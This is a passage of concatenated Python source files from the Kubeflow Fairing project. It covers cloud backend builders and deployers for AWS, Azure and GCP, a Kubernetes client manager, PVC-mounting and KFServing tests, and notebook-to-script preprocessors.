pod_spec_mutators.append(aws.add_ecr_config)
aws.create_ecr_registry(registry, constants.DEFAULT_IMAGE_NAME)
return super(AWSBackend, self).get_builder(preprocessor,
base_image,
registry,
needs_deps_installation,
pod_spec_mutators)
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for AWS
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
:returns: job for handle all the k8s' template building for a training
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(aws.add_aws_credentials_if_exists)
return Job(namespace=self._namespace, pod_spec_mutators=pod_spec_mutators)
def get_serving_deployer(self, model_class, service_type='ClusterIP', # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a deployer to be used with a serving job for AWS
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
"""
return Serving(model_class, namespace=self._namespace, service_type=service_type,
pod_spec_mutators=pod_spec_mutators)
class AzureBackend(KubernetesBackend):
""" Use to create a builder instance and create a deployer to be used with a traing job or
a serving job for the Azure backend.
"""
def __init__(self, namespace=None, build_context_source=None):
build_context_source = (
build_context_source or azurestorage_context.StorageContextSource(namespace=namespace)
)
super(AzureBackend, self).__init__(namespace, build_context_source)
def get_builder(self, preprocessor, base_image, registry,
needs_deps_installation=True, pod_spec_mutators=None):
"""Creates a builder instance with right config for Azure
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
if not azure.is_acr_registry(registry):
raise Exception("'{}' is not an Azure Container Registry".format(registry))
pod_spec_mutators.append(azure.add_acr_config)
pod_spec_mutators.append(azure.add_azure_files)
return super(AzureBackend, self).get_builder(preprocessor,
base_image,
registry,
needs_deps_installation,
pod_spec_mutators)
class KubeflowBackend(KubernetesBackend):
"""Kubeflow backend refer to KubernetesBackend """
def __init__(self, namespace=None, build_context_source=None):
if not namespace and not utils.is_running_in_k8s():
namespace = "kubeflow"
super(KubeflowBackend, self).__init__(namespace, build_context_source)
class KubeflowGKEBackend(GKEBackend):
"""Kubeflow for GKE backend refer to GKEBackend """
def __init__(self, namespace=None, build_context_source=None):
if not namespace and not utils.is_running_in_k8s():
namespace = "kubeflow"
super(KubeflowGKEBackend, self).__init__(
namespace, build_context_source)
class KubeflowAWSBackend(AWSBackend):
"""Kubeflow for AWS backend refer to AWSBackend """
def __init__(self, namespace=None, build_context_source=None): # pylint:disable=useless-super-delegation
super(KubeflowAWSBackend, self).__init__(
namespace, build_context_source)
class KubeflowAzureBackend(AzureBackend):
"""Kubeflow for Azure backend refer to AzureBackend """
def __init__(self, namespace=None, build_context_source=None): # pylint:disable=useless-super-delegation
super(KubeflowAzureBackend, self).__init__(namespace, build_context_source)
class GCPManagedBackend(BackendInterface):
""" Use to create a builder instance and create a deployer to be used with a traing job
or a serving job for the GCP.
"""
def __init__(self, project_id=None, region=None, training_scale_tier=None):
super(GCPManagedBackend, self).__init__()
self._project_id = project_id or gcp.guess_project_name()
self._region = region or 'us-central1'
self._training_scale_tier = training_scale_tier or 'BASIC'
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True, # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a builder instance with right config for GCP
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(gcp.add_gcp_credentials_if_exists)
pod_spec_mutators.append(docker.add_docker_credentials_if_exists)
# TODO (karthikv2k): Add cloud build as the deafult
# once https://github.com/kubeflow/fairing/issues/145 is fixed
if not needs_deps_installation:
return AppendBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
elif utils.is_running_in_k8s():
return ClusterBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry,
pod_spec_mutators=pod_spec_mutators,
context_source=gcs_context.GCSContextSource(
namespace=utils.get_default_target_namespace()))
elif ml_tasks_utils.is_docker_daemon_exists():
return DockerBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
else:
# TODO (karthikv2k): Add more info on how to reolve this issue
raise RuntimeError(
"Not able to guess the right builder for this job!")
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for GCP
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
:returns: job for handle all the k8s' template building for a training
"""
return GCPJob(self._project_id, self._region, self._training_scale_tier)
def get_serving_deployer(self, model_class, pod_spec_mutators=None): # pylint:disable=arguments-differ
"""Creates a deployer to be used with a serving job for GCP
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
"""
# currently GCP serving deployer doesn't implement deployer interface
raise NotImplementedError(
"GCP managed serving is not integrated into high level API yet.")
def get_docker_registry(self):
"""Returns the approriate docker registry for GCP
:returns: docker registry
"""
return gcp.get_default_docker_registry()
<file_sep>/kubeflow/fairing/kubernetes/manager.py
from kubernetes import client, config, watch
from kubeflow.fairing.utils import is_running_in_k8s
from kubeflow.fairing.constants import constants
import logging
logger = logging.getLogger(__name__)
MAX_STREAM_BYTES = 1024
class KubeManager(object):
"""Handles communication with Kubernetes' client."""
def __init__(self):
if is_running_in_k8s():
config.load_incluster_config()
else:
config.load_kube_config()
def create_job(self, namespace, job):
"""Creates a V1Job in the specified namespace.
:param namespace: The resource
:param job: Job defination as kubernetes
:returns: object: Created Job.
"""
api_instance = client.BatchV1Api()
return api_instance.create_namespaced_job(namespace, job)
def create_tf_job(self, namespace, job):
"""Create the provided TFJob in the specified namespace.
The TFJob version is defined in TF_JOB_VERSION in fairing.constants.
The version TFJob need to be installed before creating the TFJob.
:param namespace: The custom resource
:param job: The JSON schema of the Resource to create
:returns: object: Created TFJob.
"""
api_instance = client.CustomObjectsApi()
try:
return api_instance.create_namespaced_custom_object(
constants.TF_JOB_GROUP,
constants.TF_JOB_VERSION,
namespace,
constants.TF_JOB_PLURAL,
job
)
except client.rest.ApiException:
raise RuntimeError("Failed to create TFJob. Perhaps the CRD TFJob version "
"{} in not installed(If you use different version you can pass it "
"as ENV variable called "
"`TF_JOB_VERSION`)?".format(constants.TF_JOB_VERSION))
def delete_tf_job(self, name, namespace):
"""Delete the provided TFJob in the specified namespace.
:param name: The custom object
:param namespace: The custom resource
:returns: object: The deleted TFJob.
"""
api_instance = client.CustomObjectsApi()
return api_instance.delete_namespaced_custom_object(
constants.TF_JOB_GROUP,
constants.TF_JOB_VERSION,
namespace,
constants.TF_JOB_PLURAL,
name,
client.V1DeleteOptions())
def create_deployment(self, namespace, deployment):
"""Create an V1Deployment in the specified namespace.
:param namespace: The custom resource
:param deployment: Deployment body to create
:returns: object: Created V1Deployments.
"""
api_instance = client.AppsV1Api()
return api_instance.create_namespaced_deployment(namespace, deployment)
def create_kfserving(self, namespace, kfservice):
"""Create the provided KFServing in the specified namespace.
:param namespace: The custom resource
:param kfservice: The kfservice body
:returns: object: Created KFService.
"""
api_instance = client.CustomObjectsApi()
try:
return api_instance.create_namespaced_custom_object(
constants.KFSERVING_GROUP,
constants.KFSERVING_VERSION,
namespace,
constants.KFSERVING_PLURAL,
kfservice)
except client.rest.ApiException:
raise RuntimeError("Failed to create KFService. Perhaps the CRD KFServing version "
"{} is not installed?".format(constants.KFSERVING_VERSION))
def delete_kfserving(self, name, namespace):
"""Delete the provided KFServing in the specified namespace.
:param name: The custom object
:param namespace: The custom resource
:returns: object: The deleted kfservice.
"""
api_instance = client.CustomObjectsApi()
return api_instance.delete_namespaced_custom_object(
constants.KFSERVING_GROUP,
constants.KFSERVING_VERSION,
namespace,
constants.KFSERVING_PLURAL,
name,
client.V1DeleteOptions())
def delete_job(self, name, namespace):
"""Delete the specified job and related pods.
:param name: The job name
:param namespace: The resource
:returns: object: the deleted job.
"""
api_instance = client.BatchV1Api()
api_instance.delete_namespaced_job(
name,
namespace,
client.V1DeleteOptions())
def delete_deployment(self, name, namespace):
"""Delete an existing model deployment and relinquish all resources associated.
:param name: The deployment name
:param namespace: The custom resource
:returns: obje deployment.
"""
api_instance = client.ExtensionsV1beta1Api()
api_instance.delete_namespaced_deployment(
name,
namespace,
client.V1DeleteOptions())
def secret_exists(self, name, namespace):
"""Check if the secret exists in the specified namespace.
:param name: The secret name
:param namespace: The custom resource.
:returns: bool: True if the secret exists, otherwise return False.
"""
secrets = client.CoreV1Api().list_namespaced_secret(namespace)
secret_names = [secret.metadata.name for secret in secrets.items]
return name in secret_names
def create_secret(self, namespace, secret):
"""Create secret in the specified namespace.
:param namespace: The custom resource
:param secret: The secret body
:returns: object: Created secret.
"""
api_instance = client.CoreV1Api()
return api_instance.create_namespaced_secret(namespace, secret)
def get_service_external_endpoint(self, name, namespace, selectors=None): #pylint:disable=inconsistent-return-statements
"""Get the service external endpoint as http://ip_or_hostname:5000/predict.
:param name: The sevice name
:param namespace: The custom resource
:param selectors: A selector to restrict the list of returned objects by their labels.
:param Defaults: to everything
:returns: str: the service external endpoint.
"""
label_selector_str = ', '.join("{}={}".format(k, v) for (k, v) in selectors.items())
v1 = client.CoreV1Api()
w = watch.Watch()
print("Waiting for prediction endpoint to come up...")
try:
for event in w.stream(v1.list_namespaced_service,
namespace=namespace,
label_selector=label_selector_str):
svc = event['object']
logger.debug("Event: %s %s",
event['type'],
event['object'])
ing = svc.status.load_balancer.ingress
if ing is not None and len(ing) > 0: #pylint:disable=len-as-condition
url = "http://{}:5000/predict".format(ing[0].ip or ing[0].hostname)
return url
except ValueError as v:
logger.error("error getting status for {} {}".format(name, str(v)))
except client.rest.ApiException as e:
logger.error("error getting status for {} {}".format(name, str(e)))
def log(self, name, namespace, selectors=None, container='', follow=True):
"""Get log of the specified pod.
:param name: The pod name
:param namespace: The custom resource
:param selectors: A selector to restrict the list of returned objects by their labels.
:param Defaults: to everything
:param container: The container for which to stream logs.
:param if: there is one container in the pod
:param follow: True or False (Default value = True)
:returns: str: logs of the specified pod.
"""
tail = ''
label_selector_str = ', '.join("{}={}".format(k, v) for (k, v) in selectors.items())
v1 = client.CoreV1Api()
# Retry to allow starting of pod
w = watch.Watch()
try:
for event in w.stream(v1.list_namespaced_pod,
namespace=namespace,
label_selector=label_selector_str):
pod = event['object']
logger.debug("Event: %s %s %s",
event['type'],
pod.metadata.name,
pod.status.phase)
if pod.status.phase == 'Pending':
logger.warning('Waiting for {} to start...'.format(pod.metadata.name))
continue
elif ((pod.status.phase == 'Running'
and pod.status.container_statuses[0].ready)
or pod.status.phase == 'Succeeded'):
logger.info("Pod started running %s",
pod.status.container_statuses[0].ready)
tail = v1.read_namespaced_pod_log(pod.metadata.name,
namespace,
follow=follow,
_preload_content=False,
pretty='pretty',
container=container)
break
elif (event['type'] == 'DELETED'
or pod.status.phase == 'Failed'
or pod.status.container_statuses[0].state.waiting):
logger.error("Failed to launch %s, reason: %s, message: %s",
pod.metadata.name,
pod.status.container_statuses[0].state.terminated.reason,
pod.status.container_statuses[0].state.terminated.message)
tail = v1.read_namespaced_pod_log(pod.metadata.name,
namespace,
follow=follow,
_preload_content=False,
pretty='pretty',
container=container)
break
except ValueError as v:
logger.error("error getting status for {} {}".format(name, str(v)))
except client.rest.ApiException as e:
logger.error("error getting status for {} {}".format(name, str(e)))
if tail:
try:
for chunk in tail.stream(MAX_STREAM_BYTES):
print(chunk.rstrip().decode('utf8'))
finally:
tail.release_conn()
<file_sep>/tests/integration/onprem/test_pvc_mounting.py
import sys
import time
import uuid
import joblib
from kubernetes import client
from kubeflow import fairing
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.utils import mounting_pvc
GCS_PROJECT_ID = fairing.cloud.gcp.guess_project_name()
DOCKER_REGISTRY = 'gcr.io/{}'.format(GCS_PROJECT_ID)
# Dummy training function to be submitted
def train_fn(msg):
for _ in range(30):
time.sleep(0.1)
print(msg)
# Update module to work with function preprocessor
# TODO: Remove when the function preprocessor works with functions from
# other modules.
train_fn.__module__ = '__main__'
def get_job_with_labels(namespace, labels):
api_instance = client.BatchV1Api()
return api_instance.list_namespaced_job(
namespace,
label_selector=labels)
def get_deployment_with_labels(namespace, labels):
api_instance = client.AppsV1Api()
return api_instance.list_namespaced_deployment(
namespace,
label_selector=labels)
def submit_jobs_with_pvc(capsys, cleanup=False, namespace="default", # pylint:disable=unused-argument
pvc_name=None, pvc_mount_path=None):
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(py_version)
fairing.config.set_builder(
'append', base_image=base_image, registry=DOCKER_REGISTRY)
if pvc_mount_path:
pod_spec_mutators = [mounting_pvc(
pvc_name=pvc_name, pvc_mount_path=pvc_mount_path)]
else:
pod_spec_mutators = [mounting_pvc(pvc_name=pvc_name)]
expected_result = str(uuid.uuid4())
fairing.config.set_deployer('job', namespace=namespace, cleanup=cleanup,
labels={'pytest-id': expected_result}, stream_log=False,
pod_spec_mutators=pod_spec_mutators)
remote_train = fairing.config.fn(lambda: train_fn(expected_result))
remote_train()
created_job = get_job_with_labels(
namespace, 'pytest-id=' + expected_result)
assert pvc_name == created_job.items[0].spec.template.spec.volumes[0]\
.persistent_volume_claim.claim_name
if pvc_mount_path:
assert pvc_mount_path == created_job.items[0].spec.template.spec.containers[0]\
.volume_mounts[0].mount_path
else:
assert constants.PVC_DEFAULT_MOUNT_PATH == created_job.items[
0].spec.template.spec.containers[0].volume_mounts[0].mount_path
class TestServe(object):
def __init__(self, model_file='test_model.dat'):
self.model = joblib.load(model_file)
def predict(self, X, feature_names): # pylint:disable=unused-argument
prediction = self.model.predict(data=X)
return [[prediction.item(0), prediction.item(0)]]
def submit_serving_with_pvc(capsys, namespace='default', pvc_name=None, pvc_mount_path=None): # pylint:disable=unused-argument
fairing.config.set_builder('docker',
registry=DOCKER_REGISTRY,
base_image="seldonio/seldon-core-s2i-python3:0.4")
if pvc_mount_path:
pod_spec_mutators = [mounting_pvc(
pvc_name=pvc_name, pvc_mount_path=pvc_mount_path)]
else:
pod_spec_mutators = [mounting_pvc(pvc_name=pvc_name)]
expected_result = str(uuid.uuid4())
fairing.config.set_deployer('serving', serving_class="TestServe",
labels={'pytest-id': expected_result},
service_type='ClusterIP',
pod_spec_mutators=pod_spec_mutators)
fairing.config.run()
created_deployment = get_deployment_with_labels(
namespace, 'pytest-id=' + expected_result)
assert pvc_name == created_deployment.items[0].spec.template.spec.volumes[0]\
.persistent_volume_claim.claim_name
if pvc_mount_path:
assert pvc_mount_path == created_deployment.items[
0].spec.template.spec.containers[0].volume_mounts[0].mount_path
else:
assert constants.PVC_DEFAULT_MOUNT_PATH == created_deployment.items[
0].spec.template.spec.containers[0].volume_mounts[0].mount_path
def test_job_pvc_mounting(capsys):
'''Test pvc mounting for Job'''
submit_jobs_with_pvc(capsys, pvc_name='testpvc', pvc_mount_path='/pvcpath')
def test_job_pvc_mounting_without_path(capsys):
'''Test default mount path'''
submit_jobs_with_pvc(capsys, pvc_name='testpvc')
def pass_test_serving_pvc_mounting(capsys):
'''Test pvc mount for serving'''
submit_serving_with_pvc(capsys, pvc_name='testpvc', pvc_mount_path='/pvcpath')
def pass_test_serving_pvc_mounting_without_path(capsys):
'''Test default mount path for serving'''
submit_serving_with_pvc(capsys, pvc_name='testpvc')
<file_sep>/tests/unit/deployers/kfserving.py
from unittest.mock import patch
from kubeflow.fairing.deployers.kfserving.kfserving import KFServing
from kubeflow.fairing.constants import constants
DEFAULT_URI = 'gs://kfserving-samples/models/tensorflow/flowers'
CANARY_URI = 'gs://kfserving-samples/models/tensorflow/flowers'
def run_unit_test_kfserving(framework, default_model_uri, **kwargs):
kfsvc_name = 'test_kfservice'
with patch('kubeflow.fairing.deployers.kfserving.kfserving.KFServing.deploy',
return_value=kfsvc_name):
kfsvc = KFServing(framework=framework,
default_model_uri=default_model_uri, **kwargs)
generated_kfsvc = str(kfsvc.generate_kfservice())
assert constants.KFSERVING_KIND in generated_kfsvc
assert constants.KFSERVING_GROUP + '/' + \
constants.KFSERVING_VERSION in generated_kfsvc
for key in kwargs:
if key != "labels":
assert str(kwargs[key]) in generated_kfsvc
else:
assert "test_labels" in generated_kfsvc
assert kfsvc_name == kfsvc.deploy("test")
# Test kfserving function with default_model_uri.
def test_kfserving_default_model_spec():
run_unit_test_kfserving('tensorflow', DEFAULT_URI)
# Test kfserving function with namespace, default_model_uri and canary_model_uri.
def test_kfserving_default_canary_model_spec():
run_unit_test_kfserving('tensorflow', DEFAULT_URI,
namespace='kubeflow',
canary_model_uri=CANARY_URI)
# Test kfserving function with namespace, default_model_uri, canary_model_uri,
# and canary_traffic_percent
def test_kfserving_canary_traffic_percent():
run_unit_test_kfserving('tensorflow', DEFAULT_URI,
namespace='kubeflow',
canary_model_uri=CANARY_URI,
canary_traffic_percent=10)
# Test kfserving function with some labels and annotations
def test_kfserving_labels_annotations():
run_unit_test_kfserving('tensorflow', DEFAULT_URI,
namespace='kubeflow',
labels={'test-id': 'test_labels'},
annotations="test=test123")
<file_sep>/kubeflow/fairing/preprocessors/full_notebook.py
import os
from kubeflow.fairing.preprocessors.base import BasePreProcessor
from kubeflow.fairing.constants import constants
from kubeflow.fairing.notebook import notebook_util
class FullNotebookPreProcessor(BasePreProcessor):
""" The Full notebook preprocess for the context which comes from BasePreProcessor.
:param BasePreProcessor: a context that gets sent to the builder for the docker build and
sets the entrypoint
"""
# TODO: Allow configuration of errors / timeout options
def __init__(self,
notebook_file=None,
output_file="fairing_output_notebook.ipynb",
input_files=None,
command=None,
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None):
""" Init the full notebook preprocess.
:param notebook_file: the jupyter notebook file.
:param output_file: the output file, the defaut name is 'fairing_output_notebook.ipynb'.
:param input_files: the source files to be processed.
:param command: the command to pass to the builder.
:param path_prefix: the defaut destion path prefix '/app/'.
:param output_map: a dict of files to be added without preprocessing.
"""
if notebook_file is None and notebook_util.is_in_notebook():
notebook_file = notebook_util.get_notebook_name()
if notebook_file is None:
raise ValueError('A notebook_file must be provided.')
relative_notebook_file = notebook_file
# Convert absolute notebook path to relative path
if os.path.isabs(notebook_file[0]):
relative_notebook_file = os.path.relpath(notebook_file)
if command is None:
command = ["papermill", relative_notebook_file, output_file, "--log-output"]
input_files = input_files or []
if relative_notebook_file not in input_files:
input_files.append(relative_notebook_file)
super().__init__(
executable=None,
input_files=input_files,
command=command,
output_map=output_map,
path_prefix=path_prefix)
def set_default_executable(self):
""" Ingore the default executable setting for the full_notebook preprocessor.
"""
pass
<file_sep>/kubeflow/fairing/preprocessors/base.py
import os
import tarfile
import logging
import posixpath
import tempfile
from kubeflow import fairing
from kubeflow.fairing.constants import constants
from kubeflow.fairing import utils
class BasePreProcessor(object):
"""Prepares a context that gets sent to the builder for the docker build and sets the entrypoint
:param input_files: the source files to be processed
:param executable: the file to execute using command (e.g. main.py)
:param output_map: a dict of files to be added without preprocessing
:param path_prefix: the prefix of the path where the files will be added in the container
:param command: the command to pass to the builder
"""
def __init__(self,
input_files=None,
command=None,
executable=None,
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None):
self.executable = executable
input_files = input_files or []
command = command or ["python"]
self.input_files = set([os.path.normpath(f) for f in input_files])
output_map = output_map if output_map else {}
normalized_map = {}
for src, dst in output_map.items():
normalized_map[os.path.normpath(src)] = os.path.normpath(dst)
self.output_map = normalized_map
self.path_prefix = path_prefix
self.command = command
self.set_default_executable()
# TODO: Add workaround for users who do not want to set an executable for
# their command.
def set_default_executable(self): #pylint:disable=inconsistent-return-statements
""" Set the default executable file.
:returns: executable: get the default executable file if it is not existing, Or None
"""
if self.executable is not None:
return self.executable
if len(self.input_files) == 1:
self.executable = list(self.input_files)[0]
return
python_files = [item for item in self.input_files if item.endswith(".py")
and item is not '__init__.py'] #pylint:disable=literal-comparison
if len(python_files) == 1:
self.executable = python_files[0]
return
def preprocess(self):
""" Preprocess the 'input_files'.
:returns: input_files: get the input files
"""
return self.input_files
def context_map(self):
""" Create context mapping from destination to source to avoid duplicates in context archive
:returns: c_map: a context map
"""
c_map = {}
for src, dst in self.fairing_runtime_files().items():
if dst not in c_map:
c_map[dst] = src
else:
logging.warning('{} already exists in Fairing context, skipping...'.format(src))
for f in self.input_files:
dst = os.path.join(self.path_prefix, f)
if dst not in c_map:
c_map[dst] = f
else:
logging.warning('{} already exists in Fairing context, skipping...'.format(f))
for src, dst in self.output_map.items():
if dst not in c_map:
c_map[dst] = src
else:
logging.warning('{} already exists in Fairing context, skipping...'.format(src))
return c_map
def context_tar_gz(self, output_file=None):
"""Creating docker context file and compute a running cyclic redundancy check checksum.
:param output_file: output file (Default value = None)
:returns: output_file,checksum: docker context file and checksum
"""
if not output_file:
_, output_file = tempfile.mkstemp(prefix="/tmp/fairing_context_")
logging.info("Creating docker context: %s", output_file)
self.input_files = self.preprocess()
with tarfile.open(output_file, "w:gz", dereference=True) as tar:
for dst, src in self.context_map().items():
logging.debug("Context: %s, Adding %s at %s", output_file,
src, dst)
tar.add(src, filter=reset_tar_mtime, arcname=dst, recursive=False)
self._context_tar_path = output_file
return output_file, utils.crc(self._context_tar_path)
def get_command(self):
""" Get the execute with absolute path
:returns: cmd: the execute with absolute path
"""
if self.command is None:
return []
cmd = self.command.copy()
if self.executable is not None:
cmd.append(os.path.join(self.path_prefix, self.executable))
return cmd
def fairing_runtime_files(self):
"""Search the fairing runtime files 'runtime_config.py'
:returns: cmd: the execute with absolute path
"""
fairing_dir = os.path.dirname(fairing.__file__)
ret = {}
for f in ["__init__.py", "runtime_config.py"]:
src = os.path.normpath(os.path.join(fairing_dir, f))
dst = os.path.normpath(os.path.join(self.path_prefix, "fairing", f))
ret[src] = dst
return ret
def is_requirements_txt_file_present(self):
""" Verfiy the requirements txt file if it is present.
:returns: res: get the present required files
"""
dst_files = self.context_map().keys()
reqs_file = posixpath.join(self.path_prefix, "requirements.txt")
res = reqs_file in dst_files
return res
def reset_tar_mtime(tarinfo):
"""Reset the mtime on the the tarball for reproducibility.
:param tarinfo: the tarball var
:returns: tarinfo: the modified tar ball
"""
tarinfo.mtime = 0
return tarinfo
<file_sep>/kubeflow/fairing/builders/cluster/azurestorage_context.py
import uuid
from kubernetes import client
from kubeflow.fairing import utils
from kubeflow.fairing.builders.cluster.context_source import ContextSourceInterface
from kubeflow.fairing.cloud import azure
from kubeflow.fairing.constants import constants
class StorageContextSource(ContextSourceInterface):
def __init__(self, namespace=None, region=None,
resource_group_name=None, storage_account_name=None):
self.namespace = namespace or utils.get_default_target_namespace()
self.region = region or "NorthEurope"
self.resource_group_name = resource_group_name or "fairing"
self.storage_account_name = storage_account_name or "fairing{}".format(
uuid.uuid4().hex[:17]
)
self.share_name = constants.AZURE_FILES_SHARED_FOLDER
self.context_hash = None
self.context_path = None
def prepare(self, context_filename): # pylint:disable=arguments-differ
self.context_hash = utils.crc(context_filename)
self.context_path = self.upload_context(context_filename)
def upload_context(self, context_filename):
# Kaniko doesn't support Azure Storage yet.
# So instead of uploading the context tar.gz file to Azure Storage
# we are uploading the files in the context to a shared folder in Azure Files,
# mounting the shared folder into the Kaniko pod,
# and providing Kaniko with a local path to the files.
azure_uploader = azure.AzureFileUploader(self.namespace)
dir_name = "build_{}".format(self.context_hash)
storage_account_name, storage_key = azure_uploader.upload_to_share(
self.region,
self.resource_group_name,
self.storage_account_name,
self.share_name,
dir_name=dir_name,
tar_gz_file_to_upload=context_filename)
# This is the secret that we need to mount the shared folder into the Kaniko pod
azure.create_storage_creds_secret(
self.namespace, self.context_hash, storage_account_name, storage_key
)
# Local path to the files
return "/mnt/azure/{}/".format(dir_name)
def cleanup(self):
azure.delete_storage_creds_secret(self.namespace, self.context_hash)
def generate_pod_spec(self, image_name, push): # pylint:disable=arguments-differ
args = ["--dockerfile=Dockerfile",
"--destination={}".format(image_name),
"--context={}".format(self.context_path)]
if not push:
args.append("--no-push")
return client.V1PodSpec(
containers=[client.V1Container(
name='kaniko',
image=constants.KANIKO_IMAGE,
args=args,
)],
restart_policy='Never'
)
<file_sep>/kubeflow/fairing/preprocessors/converted_notebook.py
import logging
import nbconvert
import re
from nbconvert.preprocessors import Preprocessor as NbPreProcessor
from pathlib import Path
from kubeflow.fairing.preprocessors.base import BasePreProcessor
from kubeflow.fairing.notebook import notebook_util
from kubeflow.fairing.constants import constants
class FilterMagicCommands(NbPreProcessor):
"""Notebook preprocessor that have a comment which started with '!' or '%'.
:param NbPreProcessor: the notebook preprocessor.
"""
_magic_pattern = re.compile('^!|^%')
def filter_magic_commands(self, src):
"""Filter out the source commands with magic pattern.
:param src: the source commands.
:returns: filtered: the filtered commands list.
"""
filtered = []
for line in src.splitlines():
match = self._magic_pattern.match(line)
if match is None:
filtered.append(line)
return '\n'.join(filtered)
def preprocess_cell(self, cell, resources, index): #pylint:disable=unused-argument
"""preprocessor that includes cells
:param: cell: the notebook cell.
:param: resources: the code source of the notebook cell.
:param: index: unused argumnet.
:return: cell,resources: the notebook cell and its filtered with magic pattern commands.
"""
if cell['cell_type'] == 'code':
cell['source'] = self.filter_magic_commands(cell['source'])
return cell, resources
class FilterIncludeCell(NbPreProcessor):
"""Notebook preprocessor that only includes cells that have a comment 'fairing:include-cell'.
:param NbPreProcessor: the notebook preprocessor.
"""
_pattern = re.compile('.*fairing:include-cell.*')
def filter_include_cell(self, src):
"""Filter the cell that have a comment 'fairing:include-cell'.
:param: src: the source cell.
:returns: src: if the source cell matched the filter pattern, or Null.
"""
for line in src.splitlines():
match = self._pattern.match(line)
if match:
return src
return ''
def preprocess_cell(self, cell, resources, index): #pylint:disable=unused-argument
""" Preprocess the notebook cell.
:param cell: the notebook cell
:param resources: the code source of the notebook cell.
:param index: unused argumnet.
:return: cell,resources: the notebook cell and its filtered with magic pattern commands.
"""
if cell['cell_type'] == 'code':
cell['source'] = self.filter_include_cell(cell['source'])
return cell, resources
class ConvertNotebookPreprocessor(BasePreProcessor):
"""Convert the notebook preprocessor.
:param BasePreProcessor: a context that gets sent to the builder for the docker build
and sets the entrypoint.
"""
def __init__(self, #pylint:disable=dangerous-default-value
notebook_file=None,
notebook_preprocessor=FilterMagicCommands,
executable=None,
command=["python"],
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None,
overwrite=True):
"""The init function ConvertNotebookPreprocessor class.
:param notebook_file: the notebook file.
:param notebook_preprocessor: the class FilterMagicCommands.
:param executable: the file to execute using command (e.g. main.py)
:param command: the python command.
:param path_prefix: the defaut destion path prefix '/app/'.
:param output_map: a dict of files to be added without preprocessing.
"""
super().__init__(
executable=executable,
input_files=[],
output_map=output_map,
path_prefix=path_prefix)
if notebook_file is None and notebook_util.is_in_notebook():
notebook_file = notebook_util.get_notebook_name()
self.notebook_file = notebook_file
self.notebook_preprocessor = notebook_preprocessor
self.overwrite = overwrite
def preprocess(self):
"""Preprocessor the Notebook
:return:[]: the converted notebook list.
"""
exporter = nbconvert.PythonExporter()
exporter.register_preprocessor(self.notebook_preprocessor, enabled=True)
contents, _ = exporter.from_filename(self.notebook_file)
converted_notebook = Path(self.notebook_file).with_suffix('.py')
if converted_notebook.exists() and not self.overwrite:
raise Exception('Default path {} exists but overwrite flag\
is False'.format(converted_notebook))
with open(converted_notebook, 'w') as f:
logging.info('Converting {} to {}'.format(self.notebook_file, converted_notebook))
f.write(contents)
self.executable = converted_notebook
return [converted_notebook]
class ConvertNotebookPreprocessorWithFire(ConvertNotebookPreprocessor):
"""Create an entrpoint using pyfire."""
def __init__(self, #pylint:disable=dangerous-default-value
class_name=None,
notebook_file=None,
notebook_preprocessor=FilterIncludeCell,
executable=None,
command=["python"],
path_prefix=constants.DEFAULT_DEST_PREFIX,
output_map=None,
overwrite=True):
"""The init function ConvertNotebookPreprocessorWithFire class
:param class_name: the name of the notebook preprocessor.
:param notebook_file: the notebook file.
:param notebook_preprocessor: the class FilterIncludeCell.
:param command: the python command.
:param path_prefix: the defaut destion path prefix '/app/'.
:param output_map: a dict of files to be added without preprocessing.
"""
super().__init__(
notebook_file=notebook_file,
notebook_preprocessor=notebook_preprocessor,
executable=executable,
command=command,
path_prefix=path_prefix,
output_map=output_map)
self.class_name = class_name
self.overwrite = overwrite
def preprocess(self):
"""Preprocessor the Notebook.
:return: results: the preprocessed notebook list.
"""
exporter = nbconvert.PythonExporter()
exporter.register_preprocessor(self.notebook_preprocessor, enabled=True)
processed, _ = exporter.from_filename(self.notebook_file)
lines = []
for l in processed.splitlines():
# Get rid of multiple blank lines
if not l.strip():
if lines:
if not lines[-1]:
# last line is already blank don't add another one
continue
# strip in statements
if l.startswith("# In["):
continue
lines.append(l)
contents = "\n".join(lines)
converted_notebook = Path(self.notebook_file).with_suffix('.py')
if converted_notebook.exists() and not self.overwrite:
raise Exception('Default path {} exists but overwrite flag\
is False'.format(converted_notebook))
with open(converted_notebook, 'w') as f:
logging.info('Converting {} to {}'.format(self.notebook_file, converted_notebook))
f.write(contents)
f.write("\n")
logging.info('Creating entry point for the class name {}'.format(self.class_name))
f.write("""
if __name__ == "__main__":
import fire
import logging
logging.basicConfig(format='%(message)s')
